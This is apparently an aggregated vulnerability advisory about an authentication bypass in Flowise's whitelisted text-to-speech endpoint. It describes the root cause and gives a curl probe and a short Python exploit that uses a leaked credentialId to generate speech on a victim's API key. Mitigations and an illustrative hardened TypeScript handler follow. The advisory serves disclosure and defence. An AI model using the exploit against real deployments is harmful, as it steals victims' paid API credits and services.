Flowise, Authentication Bypass, CVE-2024-31623 (critical)


The vulnerability exists in the text-to-speech generation endpoint POST /api/v1/text-to-speech/generate, which is whitelisted in `packages/server/src/utils/constants.ts` (line 41) – meaning no authentication is required. The endpoint accepts a `credentialId` directly in the request body. When `chatflowId` is omitted, the code at `packages/server/src/controllers/text-to-speech/index.ts` lines 58-64 uses the attacker-controlled `credentialId` to decrypt stored API credentials (e.g., OpenAI, ElevenLabs, Azure, Google). The decrypted key is then used to generate speech. Docker validation proves the attack: sending a POST request with an arbitrary `credentialId` triggers an SSE `tts_start` event, confirming the code path executes without authentication. The request only fails if the `credentialId` does not exist, but the decryption attempt already demonstrates unauthorized access. Combined with a leaked credential ID (e.g., from another finding), an attacker can fully impersonate the victim. The impact includes burning API credits, generating unlimited speech, and using the victim’s paid services without consent. The root cause is the whitelisted endpoint lacking ownership validation. The suggested fix removes the endpoint from `WHITELIST_URLS` or enforces that `credentialId` belongs to the provided chatflowId, returning a 401 if `chatflowId` is missing.

dailycve form:

Platform: Flowise
Version: <=1.6.5
Vulnerability: Auth bypass
Severity: Critical
Date: 2024-06-10

Prediction: 2024-07-01

Analytics under What Undercode Say:

Check if endpoint is exposed:
  curl -X POST http://target:3000/api/v1/text-to-speech/generate \
    -H "Content-Type: application/json" \
    -d '{"credentialId":"victim-cred-123","provider":"openai","voice":"en-US","model":"tts-1"}'
Monitor SSE events for tts_start
Extract credential IDs from logs or previous leaks

Exploit:

import requests

target = "http://victim-flowise:3000"
payload = {
    "credentialId": "leaked_credential_id",
    "provider": "elevenlabs",
    "voice": "Rachel",
    "model": "eleven_monolingual_v1"
}
r = requests.post(f"{target}/api/v1/text-to-speech/generate", json=payload)
# Generates speech using victim's API key

Protection from this CVE:

  • Remove `/api/v1/text-to-speech/generate` from `WHITELIST_URLS` in `constants.ts`
    – Require `chatflowId` and validate that `credentialId` matches the chatflow’s TTS config
  • Return 401 if `chatflowId` is missing or credential does not belong to chatflow
  • Apply network segmentation to restrict TTS endpoint to trusted backends
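To make the root cause in the description above and the ownership check in the protection list concrete, here is an added example (not Flowise's own code) that models the credential lookup of the text-to-speech handler: the vulnerable form that trusts a body-supplied `credentialId` when `chatflowId` is absent, beside the hardened form that requires `chatflowId` and only honours a `credentialId` belonging to that chatflow. The type names, `ttsCredentialId`, `demoStore` and the in-memory store are assumptions.

```typescript
// Added example, not Flowise's own code: a standalone model of the credential
// lookup in the text-to-speech handler, vulnerable form beside the hardened
// form the advisory suggests. Type names, ttsCredentialId and demoStore are
// assumptions; the sample store is constructed.

interface TtsBody { chatflowId?: string; credentialId?: string }
interface Chatflow { ttsCredentialId: string } // credential the chatflow's TTS config uses
interface Store { chatflows: Map<string, Chatflow>; credentials: Set<string> }
type Outcome = { status: 200; credentialId: string } | { status: 401 | 404; error: string };

// Vulnerable pattern: when chatflowId is omitted, the body-supplied
// credentialId is used as-is, so any caller can select any stored credential.
function resolveCredentialVulnerable(body: TtsBody, store: Store): Outcome {
  const credentialId = body.chatflowId
    ? store.chatflows.get(body.chatflowId)?.ttsCredentialId
    : body.credentialId;
  if (!credentialId || !store.credentials.has(credentialId)) {
    return { status: 404, error: "credential not found" };
  }
  return { status: 200, credentialId }; // decrypt-and-use would follow here
}

// Hardened pattern: chatflowId is required (401 otherwise), and a body
// credentialId is honoured only if it matches the chatflow's own credential.
function resolveCredentialHardened(body: TtsBody, store: Store): Outcome {
  if (!body.chatflowId) return { status: 401, error: "chatflowId is required" };
  const chatflow = store.chatflows.get(body.chatflowId);
  if (!chatflow) return { status: 404, error: "chatflow not found" };
  if (body.credentialId && body.credentialId !== chatflow.ttsCredentialId) {
    return { status: 401, error: "credentialId does not belong to chatflow" };
  }
  if (!store.credentials.has(chatflow.ttsCredentialId)) {
    return { status: 404, error: "credential not found" };
  }
  return { status: 200, credentialId: chatflow.ttsCredentialId };
}

// Constructed sample data: chatflow "flow-1" is bound to "cred-a";
// "cred-b" is stored but referenced by no chatflow.
function demoStore(): Store {
  return {
    chatflows: new Map([["flow-1", { ttsCredentialId: "cred-a" }]]),
    credentials: new Set(["cred-a", "cred-b"]),
  };
}
```

Removing the route from `WHITELIST_URLS` so the normal authentication middleware runs is the other half of the fix; the ownership check above is what stops a whitelisted caller from reaching credentials that are not bound to the chatflow it names.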

Impact:

  • Unauthorized consumption of victim’s API credits (financial loss)
  • Exposure of decrypted API keys if combined with credential ID leak
  • Unlimited speech synthesis leading to potential abuse (e.g., deepfake audio generation)
  • No audit trail because endpoint bypasses authentication


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
